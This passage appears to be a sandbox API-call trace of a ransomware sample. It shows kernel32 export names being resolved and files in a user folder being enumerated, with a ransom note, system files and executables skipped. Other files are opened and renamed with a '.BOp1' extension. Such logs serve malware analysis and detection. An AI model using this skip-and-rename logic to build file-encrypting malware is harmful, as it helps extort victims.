[0085.489] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.489] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.489] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.489] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.489] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.489] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.489] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.489] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.489] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.489] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.489] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.489] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.489] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.489] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.489] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.489] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.489] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.490] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.490] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.490] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.490] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.490] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.490] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.490] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.490] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.490] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.490] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.490] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.490] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.490] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.490] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.490] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.490] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.490] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.491] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.491] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.491] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.491] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.491] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.491] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.491] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.491] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.491] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.491] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.491] lstrlenA (lpString="DELETEATOM") returned 10 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.491] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.491] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.491] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.491] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.491] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.491] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.491] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.492] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.492] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.492] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.492] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.492] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.492] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.492] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.492] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.492] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.492] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.492] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.492] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.492] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.492] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.492] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.492] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.492] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.492] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.493] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.493] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.493] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.493] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.493] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.493] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.493] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.493] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.493] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.493] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.493] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.493] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.493] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.493] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.493] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.493] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.493] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.493] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.494] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.494] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav") returned 64 [0085.494] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav.BOp1") returned 69 [0085.494] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\a940hnh.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav.BOp1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\a940hnh.wav.bop1"), dwFlags=0x0) returned 1 [0085.495] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.495] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.496] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.496] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0aa8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf0aa8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0aa8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.496] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.496] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf084780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf084780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf084780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.496] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.496] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.496] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.496] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.496] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.496] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.496] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0085.496] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.496] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0085.496] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\jkbimi8.tmp" [0085.496] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.497] CloseHandle (hObject=0x0) returned 0 [0085.497] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.497] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f60c9a0, ftCreationTime.dwHighDateTime=0x1d4c5e2, ftLastAccessTime.dwLowDateTime=0x191b5a60, ftLastAccessTime.dwHighDateTime=0x1d4cc50, ftLastWriteTime.dwLowDateTime=0x191b5a60, ftLastWriteTime.dwHighDateTime=0x1d4cc50, nFileSizeHigh=0x0, nFileSizeLow=0x172c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="x3Cc3WVmpwY_49.wav", cAlternateFileName="X3CC3W~1.WAV")) returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="autorun.inf") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="boot.ini") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="desktop.ini") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="ntuser.dat") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="iconcache.db") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="bootsect.bak") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="ntuser.dat.log") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="thumbs.db") returned 1 [0085.497] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav", lpString2="Bootfont.bin") returned 1 [0085.497] lstrlenW (lpString="x3Cc3WVmpwY_49.wav") returned 18 [0085.497] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.497] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.498] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.498] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.498] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0085.498] lstrlenW (lpString="x3Cc3WVmpwY_49.wav") returned 18 [0085.498] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0085.498] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="x3Cc3WVmpwY_49.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav" [0085.498] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav" (normalized: "c:\\users\\5p5nrgjn0js 